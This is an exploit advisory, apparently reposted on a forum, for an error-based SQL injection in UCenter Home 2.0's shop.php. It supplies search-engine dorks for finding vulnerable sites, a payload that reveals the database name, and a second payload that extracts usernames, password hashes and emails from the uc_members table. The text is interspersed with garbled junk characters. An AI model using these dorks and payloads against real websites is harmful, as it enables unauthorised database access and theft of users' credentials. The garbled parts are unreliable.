% c, U0 b& [: y' p/ Y6 x
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
; F; k! t( Q. u+ j& @' F0 @6 r1 w) m& y* u5 k, L
@+ m" @- F7 l% u1 j
+ @& X( F( C7 S. q+ d) y# w: p*/ Author : KnocKout
# y7 F$ f5 K6 U# S' h0 w9 Y- w* g% [- q
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
$ r2 }6 @. \6 J* k% n' \$ b2 y+ ~- T) t$ D8 J
*/ Contact: knockoutr@msn.com
" J& Q$ `" P- `% o: C r
3 y& g8 k+ i" y; ]( F8 W*/ Cyber-Warrior.org/CWKnocKout " n9 f4 X0 z* u
# M- p( j/ A- L, M! {4 u8 U$ o
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 H1 i" R _8 q- f3 c+ a/ ~* A- o& X; S2 z
Script : UCenter Home
2 H. e& f9 X- s6 U
" `# E) \* O2 e' g. ZVersion : 2.0 0 u# [1 Y) {- _
; H' A- f& A; a5 C) d
Script HomePage : http://u.discuz.net/ - q1 [6 N' H! J0 Q6 L
2 [6 S0 S' j( y( A3 }__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, k3 N5 X4 ^+ _6 I1 s: n3 j/ Q; m, P' o+ r0 `5 X1 N5 g
Dork : Powered by UCenter inurl:shop.php?ac=view
4 ]7 z1 I( M) m# V8 u2 p3 n. j& ?3 \0 L4 `3 J( W$ ]
Dork 2 : inurl:shop.php?ac=view&shopid=
1 p* f# N1 r, ~$ T+ p- X* ^2 r- j! D# k
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& B$ d# G. y1 g. O( z' }" j0 ^" o1 W
Vuln file : Shop.php 8 ]+ O1 ]6 U5 g8 E5 s3 ^
' z D2 m7 K1 _" A. L+ R0 A9 h4 o4 K p T
value's : (?)ac=view&shopid= 0 N7 f" ` T8 D, x
& v" G1 U% K* i, B+ v
Vulnerable Style : SQL Injection (MySQL Error Based)
4 `! }: e/ I0 I l" H
) j2 _8 ~) }& Q( X* ^( i! z# M: ?# f( wNeed Metarials : Hex Conversion ' ?2 W; _; h! }' E5 \- ~" A
5 K; z( `) {' Q N$ C4 z+ n1 ^__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 K" s" [9 {% w2 A+ v- c' Q
2 {9 c* i- j% I; q3 IYour Need victim Database name. 2 H: O/ x2 Q7 C+ T s5 E6 O9 a
) b$ z( b- ^( G h" {- k: F7 hfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 8 a4 Y: b! ~; M4 B
& r K8 {7 c; ]' d
.. ! i5 x. S- k" h! X
+ b' P7 z# x( z
DB : Okey. & ]9 Z% @! f5 ` @ R! U, x5 ?8 D* ?
. Q. {/ e9 o! {' H$ U: O* D6 Oyour edit DB `[TARGET DB NAME]` ( n J1 I" m- m3 k! a8 P8 D* b
# D7 _: `* ?9 v% d3 TExample : 'hiwir1_ucenter' - M; j% l- E8 I' T8 o6 |& k
4 J, N6 ^' r4 f6 g AEdit : Okey. & u/ P1 I9 A( P4 ^' q+ V
8 x) m2 c3 B; r8 GYour use Hex conversion. And edit Your SQL Injection Exploit.. - O' ^2 Z) u/ G& L4 `
K. U6 L5 v% q
" s0 r* O! L' t. E3 `8 j2 J% |3 [: Y* o
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
E6 w: `$ ?; u+ f9 x2 i: w- I |
发表于 2013-2-27 21:31:31
收藏
支持
反对